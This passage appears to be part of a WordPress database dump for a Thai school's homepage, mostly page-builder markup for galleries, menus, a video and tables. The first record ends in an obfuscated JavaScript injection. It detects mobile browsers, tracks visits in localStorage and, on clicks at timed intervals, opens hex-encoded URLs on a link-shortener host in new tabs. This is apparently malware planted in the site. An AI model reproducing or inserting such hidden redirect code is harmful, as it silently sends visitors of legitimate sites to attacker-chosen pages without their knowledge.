)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:32:55','2024-07-29 11:32:55','',19,'http://watprato.ssk.in.th/?p=93',0,'revision','',0),
(95,1,'2024-07-29 18:33:23','2024-07-29 11:33:23','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 